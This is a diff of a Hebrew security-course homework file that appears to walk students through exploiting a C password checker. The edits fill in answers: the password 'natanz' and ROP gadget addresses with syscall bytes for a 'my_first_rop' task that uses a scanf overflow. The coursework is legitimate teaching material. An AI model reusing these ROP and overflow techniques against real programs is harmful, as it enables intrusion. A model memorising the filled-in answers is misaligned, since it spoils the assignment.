@@ -4234,7 +4626,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>y == hash</w:t>
+        <w:t xml:space="preserve">y == </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>hash</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4246,6 +4649,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4347,6 +4751,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> הנכונה שתגרום לפונקציה </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4354,6 +4759,7 @@
         </w:rPr>
         <w:t>checkPassword</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4406,27 +4812,10 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>___________</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>_____________________</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>_____</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natanz</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4661,7 +5050,29 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> main(){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>main(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4704,8 +5115,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> password[</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>password[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4747,8 +5170,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4790,8 +5237,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    scanf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>scanf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4853,8 +5324,42 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(checkPassword(password)){</w:t>
-      </w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>)){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4876,8 +5381,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>        printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4896,8 +5425,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>, password);</w:t>
-      </w:r>
+        <w:t>, password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4941,6 +5482,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4961,6 +5503,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5005,8 +5548,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5017,6 +5584,7 @@
         </w:rPr>
         <w:t>"wrong password! After 3 wrong passwords this program will destroy the computer. Good luck. \n"</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5027,6 +5595,7 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5068,7 +5637,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5090,6 +5670,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5152,6 +5733,7 @@
         </w:rPr>
         <w:t xml:space="preserve">הסבירו בקצרה מה הבעיה בקריאה של התוכנית ל </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5162,6 +5744,7 @@
         </w:rPr>
         <w:t>scanf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5491,7 +6074,31 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">לפתרון הסעיף מומלץ להסתכל בקוד אסמבלי של </w:t>
+        <w:t xml:space="preserve">לפתרון הסעיף מומלץ להסתכל בקוד </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>אסמבלי</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> של </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5514,6 +6121,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> או להשתמש ב־</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5524,6 +6132,7 @@
         </w:rPr>
         <w:t>gdb</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5847,6 +6456,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> להיעזר ב </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5857,6 +6467,7 @@
         </w:rPr>
         <w:t>objdump</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6146,8 +6757,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %rdi</w:t>
+              <w:t>op %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rdi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6232,6 +6855,7 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6242,6 +6866,7 @@
               </w:rPr>
               <w:t>syscall</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6312,8 +6937,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>pop %rax</w:t>
+              <w:t>pop %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rax</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6416,8 +7053,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %rsi</w:t>
+              <w:t>op %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rsi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6559,8 +7208,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>dd %r15, %r</w:t>
+              <w:t>dd %r15, %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6569,7 +7219,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>d</w:t>
+              <w:t>r</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6579,8 +7229,19 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>d</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
               <w:t>i</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6693,11 +7354,10 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ush %rbp</w:t>
+              <w:t>ush %</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -6705,8 +7365,12 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t>rbp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -6714,8 +7378,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>m</w:t>
-            </w:r>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6724,11 +7387,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ov %rsp, %rbp</w:t>
+              <w:t>m</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -6736,7 +7397,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>ov %</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6745,8 +7408,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>c</w:t>
+              <w:t>rsp</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6755,8 +7419,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">all </w:t>
+              <w:t>, %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6765,9 +7430,12 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>*</w:t>
+              <w:t>rbp</w:t>
             </w:r>
-            <w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -6775,8 +7443,59 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>%rax</w:t>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c</w:t>
             </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">all </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>*</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>%</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rax</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6923,8 +7642,21 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>צרפו צילום מסך של ערך היציאה. לכתיבת ערכים בינארים</w:t>
-      </w:r>
+        <w:t xml:space="preserve">צרפו צילום מסך של ערך היציאה. לכתיבת ערכים </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>בינארים</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6955,8 +7687,20 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>\xHH</w:t>
-      </w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xHH</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7412,6 +8156,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7422,6 +8167,7 @@
         </w:rPr>
         <w:t>my_first_rop</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7474,7 +8220,31 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (אוקטלי) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>אוקטלי</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7498,6 +8268,7 @@
         </w:rPr>
         <w:t>בות לדרך היציאה מהתוכנית ואין חשיבות לפלט שמודפס לגבי נכונות הסיסמה. בפרט, זה בסדר שהתוכנית תסתיים כתוצאה מ</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7508,6 +8279,7 @@
         </w:rPr>
         <w:t>segfault</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>

--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -6817,6 +6817,28 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>0x</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>4016B0</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6837,6 +6859,17 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>0f 05</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6892,6 +6925,17 @@
